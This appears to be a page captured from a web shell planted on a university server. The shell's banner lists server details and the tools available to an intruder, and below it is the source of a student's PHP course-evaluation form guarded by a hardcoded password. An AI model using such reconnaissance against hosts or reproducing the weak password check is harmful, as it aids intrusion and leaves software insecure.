Server IP : 172.16.15.8 / Your IP : 3.145.68.167 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vgmiller/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Author: Valerie Miller Instructor: Dr. Wang File Name: evaluationForm.php Due Date: April 24, 2018 Goal: To create an evaluation form that has input for gender, status, and course, then has 3 simple questions in regards to the students evaluation of the course. --> <CENTER> <?php session_start(); $pass = $_SESSION['p']; if($pass != "project") { print "<CENTER><H2>Denied!</H2><P> Please return to the course evaluation login page and enter a correct password.<P> </CENTER>"; ?> <FORM> <A HREF="projectLoginEvaluation.html"> <INPUT type="button" value="Login Page"></A> </FORM> <?php } else { ?> <CENTER> <H2>Course Evaluation Form</H2> <HR> <form action=evaluationAction.php method=post> <table style="border: 1px solid black; background-color:C6C6C6"> <tr> <td> Select your gender:<P> <INPUT type=radio name=g value=female checked>Female<BR> <INPUT type=radio name=g value=male>Male<BR> <P> Select your year:<P> <INPUT type=radio name=y value=Freshman checked>Freshman<BR> <INPUT type=radio name=y value=Sophomore>Sophomore <BR> <INPUT type=radio name=y value=Junior> Junior <BR> <INPUT type=radio name=y value=Senior> Senior<BR> <P> <HR> <P>Input the course:<P> <input type=text size=20 name=course> <P> <HR> Course Evaluation: <P>How would you rate the lecture preparation in the course?<P> <INPUT type=radio name=e1 value=0>Poor<BR> <INPUT type=radio name=e1 value=1>Average<BR> <INPUT type=radio name=e1 value=2>Good<BR> <P> <P>How would you rate student participation in the course?<P> <INPUT type=radio name=e2 value=0>Poor<BR> <INPUT type=radio name=e2 value=1>Average<BR> <INPUT type=radio name=e2 value=2>Good<BR> <P> <P>Overall, how would you rate the class?<P> <INPUT type=radio name=e3 value=0>Poor<BR> <INPUT type=radio name=e3 value=1>Average<BR> <INPUT type=radio name=e3 value=2>Good<BR> <P> </td> </tr> </table> <P> <input type=submit value=Submit> <input type=reset value=Reset> </form> </CENTER> <?php } ?>